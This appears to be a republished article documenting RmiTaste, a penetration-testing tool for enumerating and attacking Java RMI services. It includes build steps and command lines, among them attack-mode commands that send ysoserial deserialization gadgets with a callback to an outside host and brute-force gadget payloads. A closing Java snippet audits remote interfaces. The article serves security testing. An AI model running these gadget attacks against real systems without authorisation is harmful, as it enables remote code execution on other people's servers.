
What tool is RmiTaste?

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--


RmiTaste

RmiTaste helps security researchers detect, enumerate, interact with, and attack RMI services by calling remote methods with gadgets from the ysoserial utility. It also allows remote methods to be called with specific parameters.

The main purpose of RmiTaste is to help security experts identify unsafe RMI services in the target system. Unauthorized access to the target computer system is an illegal act, and the use of RmiTaste must be carried out in legal scenarios.

Building and running the tool

Note that OpenJDK v11.0.3 is required to run this tool.

First, download ysoserial-master-SNAPSHOT.jar from the following address and store it in the libs_attack directory:

https://github.com/frohoff/ysoserial

Second, use Maven to build the project code:

mvn package

Next, run the following command:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h

@author Marcin Ogorzelski (mzero - @_mzer0)
STM Solutions

Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Tool use

RmiTaste provides four modes of operation, namely connection, enumeration, attack, and invocation. Each mode provides a separate help menu:

java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste -h
(...)
Usage: [-h] [COMMAND]
  -h, --help   displays this help message
Commands:
  conn     detects connections to hosts
  enum     enumerates RMI services
  attack   attacks RMI registration methods
  call     calls specific methods of RMI remote objects

conn connection mode

The conn connection mode allows us to determine whether the destination port is an RMI service port:

# Check if 127.0.0.1:1099 is RMI Service
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn -t 127.0.0.1 -p 1099

enum enumeration mode

The enum enumeration mode lets researchers obtain information about RMI services, such as remote object names and the classes and interfaces that the remote objects extend and implement. If the interface implemented by the remote object is available on the RmiTaste classpath, RmiTaste prints all of its remote methods and allows us to call them directly:

# RMI service enumeration
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

attack attack mode

The attack mode allows remote methods to be called with a ysoserial gadget chain as the parameter. Assume that the remote object has the following methods:

acc1 [object] [127.0.1.1:38293]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     setPin(java.lang.String param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     getBalance(); [method]
     deposit(java.lang.Object param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     withdraw(float param0) [method]

# Call all remote methods with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -g "URLDNS" -c "http://rce.mzero.pl"

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameter
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -g "URLDNS" -c "http://rce.mzero.pl"

The "-gen bruteforce" option also lets us brute-force a remote method with the gadgets from ysoserial:

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:deposit" -gen bruteforce -c "ping 127.0.0.1"

call call mode

The call mode allows us to call specific methods of an RMI remote object. Assume that the remote object has the following methods:

acc1 [object] [127.0.1.1:38293]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     setPin(java.lang.String param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     getBalance(); [method]
     deposit(java.lang.Object param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     withdraw(float param0) [method]

# Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance"

# Call m0.rmitaste.example.server.ClientAccount.setPin("1234") method on acc1 remote object
java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call -t 127.0.0.1 -p 1099 -m "acc1:m0.rmitaste.example.server.ClientAccount:setPin" -mp "string=1234"

Sample usage of the tool

Click [here] to get the sample server.

First, run the sample server.

Next, enumerate the objects:

root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java -cp ".:libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum -t 127.0.0.1 -p 1099

acc1 [object] [127.0.1.1:42881]
     extends java.rmi.server.RemoteObjectInvocationHandler [class]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     extends java.rmi.server.RemoteObject [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     No methods found. I don't have remote object interface. Give it to me!

acc2 [object] [127.0.1.1:42881]
     extends java.rmi.server.RemoteObjectInvocationHandler [class]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     extends java.rmi.server.RemoteObject [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     No methods found. I don't have remote object interface. Give it to me!

As you can see, RmiTaste needs the interface of the remote object. During a penetration test, these interfaces have to be found as well. In this example, we only need to copy rmitaste.examples-1.0-SNAPSHOT-all.jar into the libs_attack directory. The enumerated objects then look as follows:

acc1 [object] [127.0.1.1]
     extends java.rmi.server.RemoteObjectInvocationHandler [class]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     extends java.rmi.server.RemoteObject [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     setPin(java.lang.String param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     getBalance(); [method]
     deposit(java.lang.Object param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     withdraw(float param0); [method]

acc2 [object] [127.0.1.1]
     extends java.rmi.server.RemoteObjectInvocationHandler [class]
     implements java.rmi.Remote [interface]
     extends java.lang.reflect.Proxy [class]
     extends java.rmi.server.RemoteObject [class]
     implements m0.rmitaste.example.server.ClientAccount [interface]

     setPin(java.lang.String param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     getBalance(); [method]
     deposit(java.lang.Object param0); [method]
         Parameters: param0; may be vulnerable to Java Deserialization! [info]
     withdraw(float param0); [method]
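The enum listings above flag every remote method that takes a non-primitive parameter as possibly exposed to Java deserialization. The same check can be run over your own remote interfaces before they are exported. The following is an added example, not RmiTaste code; the nested ClientAccount interface is a constructed stand-in for the one in the listing, and its return types are assumed.

```java
import java.lang.reflect.Method;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

public class RemoteInterfaceAudit {

    // Constructed stand-in for the ClientAccount interface in the listing.
    // Method names and parameter types follow the enum output; return types are assumed.
    public interface ClientAccount extends Remote {
        void setPin(String pin) throws RemoteException;
        float getBalance() throws RemoteException;
        void deposit(Object amount) throws RemoteException;
        void withdraw(float amount) throws RemoteException;
    }

    // Returns one entry per remote method that has at least one non-primitive
    // parameter, i.e. a parameter that arrives at the server as a serialized object.
    static List<String> flagObjectParameters(Class<?> iface) {
        if (!iface.isInterface() || !Remote.class.isAssignableFrom(iface)) {
            throw new IllegalArgumentException(iface.getName() + " is not a remote interface");
        }
        List<String> findings = new ArrayList<>();
        for (Method m : iface.getMethods()) {
            List<String> objectParams = new ArrayList<>();
            Class<?>[] types = m.getParameterTypes();
            for (int i = 0; i < types.length; i++) {
                if (!types[i].isPrimitive()) {
                    objectParams.add("param" + i + " (" + types[i].getName() + ")");
                }
            }
            if (!objectParams.isEmpty()) {
                findings.add(m.getName() + ": " + String.join(", ", objectParams));
            }
        }
        Collections.sort(findings); // getMethods() returns methods in no particular order
        return findings;
    }

    public static void main(String[] args) throws ClassNotFoundException {
        // No argument: audit the constructed sample. Otherwise audit the named interface from the classpath.
        Class<?> target = args.length > 0 ? Class.forName(args[0]) : ClientAccount.class;
        flagObjectParameters(target).forEach(System.out::println);
    }
}
```

Run without arguments, it reports deposit and setPin, the two methods flagged in the listing; getBalance and withdraw take no object parameters and are not reported.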
